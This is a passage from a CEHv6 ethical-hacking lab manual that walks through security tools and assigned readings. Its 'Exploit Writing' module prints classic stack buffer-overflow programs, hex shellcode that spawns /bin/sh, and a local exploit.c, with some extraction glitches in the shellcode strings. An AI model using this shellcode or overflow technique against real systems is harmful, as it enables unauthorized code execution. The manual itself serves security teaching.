Module 26. Penetration Testing

Module 26

Penetration Testing

Lab 26-01

Objective:

Use Azure Web Log to know details about your web traffic

In the CEHv6 Labs CD-ROM, navigate to Module 26

Install and Launch Azure Web Log

Start a New Project from Project -> New. Enter the data and click Ok

Start a New Log File from File -> Add Log

Click Hits and Refs

Click Site Info

Click Current Month

Click Previous Month

Click Year Hits

Click Hour

Click System

Country

Lab 26-02

Objective:

Use iInventory to capture hardware & software inventory and registry keys without having to leave your desk.

In the CEHv6 Labs CD-ROM, navigate to Module 26

Install and launch iInventory

Click button Audit this PC in the left side pane. To start performance audit

Performance Audit Report

Click Scan Network button on the left side pane.

Click Agent Builder Wizard on the left pane

Set the options and click Next to forward to the next step

Click Show Agent Config button on the left side pane

Select an agent file from the list to display its summary

Summary of agent configuration

Lab 26-03

Objective:

Use Link Utility to check links on Web sites and sustaining their efficiency.

In the CEHv6 Labs CD-ROM, navigate to Module 26

Install and launch Link Utility

Click New Project button

Click Import from HTML File. Select a file to import site addresses from. Click Ok

Click Settings button to change the present options

Click Scan button. Click Yes

Click on the Report to generate the report file

Lab 26-04

Objective:

Use MaxCrypt to perform automated computer encryption.

Install and launch MaxCrypt

Click on New User to create a New User

Now Login

Click on the MaxCrypt icon in the windows system tray to access the MaxCrypt Quick Menu

Click on Manage Volumes

Click on Create Volume button to create a new volume

Enter the data and click Create Volume

The New Volume F:\ is created

Click on the MaxCrypt icon in the windows system tray to access the MaxCrypt Quick Menu

Click on Conceal Files

Select a file and click Add button

Finally Logout user

Lab 26-05

Objective:

Use Sniffem for monitoring network and capturing data traffic.

In the CEHv6 Labs CD-ROM, navigate to Module 26

Install and launch Sniffem

Click Settings button to modify the present settings

Click Capture button to start capturing the activities

Click Stop button to stop capturing

Lab 26-06

Objective:

Use SQL Stripes to monitor and control your SQL Servers.

In the CEHv6 Labs CD-ROM, navigate to Module 26

Install and Launch SQL Stripes

Click Yes

Select Settings to modify the present options

Select Server from the left side pane in the above window and click + symbol button in the right side pane to create a new server

Enter details and click OK to create a new server

Server 1 Created

Check the Console

Lab 26-07

Objective:

Use TraceRoute Program to know the route over the network between two systems, listing of all the intermediate routers connected to its destination.

In the CEHv6 Labs CD-ROM, navigate to Module 26

Install and launch TraceRoute

Input URL www.juggyboy.com in the Address bar. Click Trace

Trace Result

Repeat the same for other sites

Lab 26-08

Objective:

Use Windows Security Officer to restrict the resources for an application

In the CEHv6 Labs CD-ROM, navigate to Module 26

Install and Launch Windows Security Officer

Initially click to change the administrator password

Expand System 10 options in the left side pane

Select Control Panel to modify the options

Select Shell Restrictions to modify the options

Select IE Browser Security to modify the options

Select IE Cookies Viewer to modify the options

Select Log User Activity to modify the options

Select Restrict User Work Time to modify the options

Select Folder Guard to modify the options

Lab 26-09

In the CEHv6 Labs CD-ROM, navigate to Module 26

Open the Penetration Testing.pdf and read the content Develop a penetration test plan

Lab 26-10

In the CEHv6 Labs CD-ROM, navigate to Module 26

Open the Software Penetration Testing.pdf and read the content Penetration testing

today

Module 27

Covert Hacking

Lab 27-01

In the CEHv6 Labs CD-ROM, navigate to Module 27

Open the Covert Channel Analysis and Data Hiding in TCPIP.pdf and read the content

Covert Channels

Lab 27-02

In the CEHv6 Labs CD-ROM, navigate to Module 27

Open the Bypassing Firewall.pdf and read the content Firewall Piercing (Inside-Out Attacks)

In the same PDF file, read the Examples of Covert Channel Attacks topic

Lab 27-03

In the CEHv6 Labs CD-ROM, navigate to Module 27

Open the Covert Actions.pdf and read the content Covert channels are the principle

enablers in a DDoS attack

Lab 27-04

In the CEHv6 Labs CD-ROM, navigate to Module 27

Open the Covert channel vulnerabilities in anonymity systems.pdf and read the content

Covert channels

Module 30

Exploit Writing

Lab 30-01

In the CEHv6 Labs CD-ROM, navigate to Module 30

Boot your computer using the BackTrack CD-ROM

Open command shell and type: kedit example1.c

Type the following in kedi:

void function(int a, int b, int c) { char buffer1[5];

char buffer2[10];

}

void main() { function(1,2,3);

}

Save the program in kedit.

Compile the program by typing: $ gcc -S -o example1.s example1.c

View the generated assembly file by typing: kedit example1.s

Lab 30-02

example2.c

In the CEHv6 Labs CD-ROM, navigate to Module 30

Create another program in kedit.

Kedit example2.c

Type the following:

void function(char *str) { char buffer[16];

strcpy(buffer,str);

}

void main() {

char large_string[256];

int i;

for( i = 0; i < 255; i++) large_string[i] = 'A';

function(large_string);

}

Save the program in kedit.

Compile the program by typing: $ gcc -o example2.s example2.c

Run the program by typing: ./example2.s

You should see a segmentation fault error

View the generated assembly file by typing: kedit example2.asm

Lab 30-03 Objective:

example3.c

In the CEHv6 Labs CD-ROM, navigate to Module 30

Create another program in kedit. Kedit example3.c

Type the following:

void function(int a, int b, int c) { char buffer1[5];

char buffer2[10];

int *ret;

ret = buffer1 + 12;

(*ret) += 8;

}

void main() { int x;

x = 0;

function(1,2,3);

x = 1;

printf("%d\n",x);

}

Save the program and compile it by typing: $gcc –o example3 example3.c

Run the program by typing: $./example3

It should print one

Disassemble main using gdb

Type the following: $gdb example3

Type: disassemble main

Lab 30-04

Objective:

shellcode.c

In the CEHv6 Labs CD-ROM, navigate to Module 26

Create another program in kedit Kedit shellcode.c

Type the following:

#include <stdio.h>

void main() { char *name[2];

name[0] = "/bin/sh";

name[1] = NULL;

execve(name[0], name, NULL);

}

Compile the program by typing:

$ gcc -o shellcode -ggdb -static shellcode.c

Type:

$ gdb shellcode

Then, type disassemble main.

Type disassemble _execve

Lab 30-05 Objective:

exit.c

In the CEHv6 Labs CD-ROM, navigate to Module 26

Create another program in kedit.

Kedit exit.c

Type the following:

#include <stdlib.h>

void main() { exit(0);

}

Compile the program using:

$ gcc -o exit -static exit.c

View the generated code gdb by typing:

gdb exit

Then:

disassemble _exit

Lab 30-06

Objective:

testsc.c

In the CEHv6 Labs CD-ROM, navigate to Module 26

Create another program in kedit.

Kedit testsc.c

Type the following:

char shellcode[] =

"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x 00\x00"

"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\x cd\x80"

"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\x ff\xff"

"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

void main() { int *ret;

ret = (int *)&ret + 2;

(*ret) = (int)shellcode;

}

Compile the program using:

$ gcc -o testsc testsc.c

Run the program by typing:

./testsc

You should see a shell launched.

Type exit to exit the shell.

Lab 30-07

Objective:

exploit.c

In the CEHv6 Labs CD-ROM, navigate to Module 26

Create another program in kedit Kedit exploit.c

Type the following:

char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b

"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd

"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

char large_string[128];

void main() { char buffer[96];

int i;

long *long_ptr = (long *) large_string;

for (i = 0; i < 32; i++)

*(long_ptr + i) = (int) buffer;

for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i];

strcpy(buffer,large_string);

}

Compile the program using:

$ gcc -o exploit exploit.c

Run the program by typing:

./exploit

You should see a shell launched

Type exit to exit the shell

Module 34

Mac OS X Hacking

Lab 34-01

In the CEHv6 Labs CD-ROM, navigate to Module 34

Open the Securing Mac OS X.pdf and read the content

Read the Security Hardening Guideline topic

In the same PDF file, read the Data Encryption topic

Lab 34-02

In the CEHv6 Labs CD-ROM, navigate to Module 34

Open the Security in Mac OS X.pdf and read the content

Read the Secure Default Settings topic

In the same PDF file, read the Modern Security Architecture topic

Next, read the Strong Authentication topic

Lab 34-03

In the CEHv6 Labs CD-ROM, navigate to Module 34

Open the Mac OS X 10.4 Security Checklist.pdf and read the content

Read the OS X Security Architecture topic

In the same PDF file, read the User Account Security topic

Next, read the Securing System Preferences topic

Lab 34-04

In the CEHv6 Labs CD-ROM, navigate to Module 34

Open the Mac OS X Hacking Poses Wide Risk to Windows.pdf and read the content

Read the Mac OS X Hacking Poses Wide Risk… for Windows topic

Module 35

Hacking Routers, Cable Modems, and

Firewalls

Lab 35-01

In the CEHv6 Labs CD-ROM, navigate to Module 35

Open the Chapter 9-Firewalls.pdf and read the content

Read the FIREWALL IDENTIFICATION topic

Next, read the PACKET FILTERING topic

Lab 35-02

In the CEHv6 Labs CD-ROM, navigate to Module 35

Open the CISCO ROUTERS AS TARGETS.pdf and read the content

Read the Compromised Router Sniffing topic

In the same PDF file, read the Why we need to protect router resources topic

Next, read the Router Audit Tool topic

Lab 35-03

In the CEHv6 Labs CD-ROM, navigate to Module 35

Open the Cisco Router Security Best Practices.pdf and read the content

Read the Access management topic

In the same PDF file, read the SNTP Security topic

Next, read the Access control lists topic

Lab 35-04

In the CEHv6 Labs CD-ROM, navigate to Module 35

Open the 8 steps to protect your Cisco router.pdf and read the content

In the same PDF file, read the Encrypt all passwords topic

Module 36

Hacking Mobile Phones, PDA, and

Handheld Devices

Lab 36-01

In the CEHv6 Labs CD-ROM, navigate to Module 36

Open the Take Control of Your iPhone.pdf and read the content

Read the QUICK START TO TAKING CONTROL OF AN iPHONE topic

In the same PDF file, read the 8 QUICK TROUBLESHOOTING STEPS topic

Next, read the AVOID NAVIGATION AND TYPING HASSLES topic

Lab 36-02

In the CEHv6 Labs CD-ROM, navigate to Module 36

Open the iphone Hardware Unlock.pdf and read the content

Lab 36-03

In the CEHv6 Labs CD-ROM, navigate to Module 36

Open the How to Unlock an iPhone.pdf and read the content

Lab 36-04

In the CEHv6 Labs CD-ROM, navigate to Module 36

Open the The Anatomy of a Hack.pdf and read the content.

Read the Understanding the Threats to Your Mobile Workforce topic

In the same PDF file, read the Anatomy of a Hack Video Companion Guide topic

Lab 36-05

In the CEHv6 Labs CD-ROM, navigate to Module 36

Open the Mobile Handset Security.pdf and read the content

Read the Security issues on mobile devices topic

In the same PDF file, read the Threats and Attacks topic

Lab 36-06

In the CEHv6 Labs CD-ROM, navigate to Module 36

Open the Mobile Malware Threats and Prevention.pdf and read the content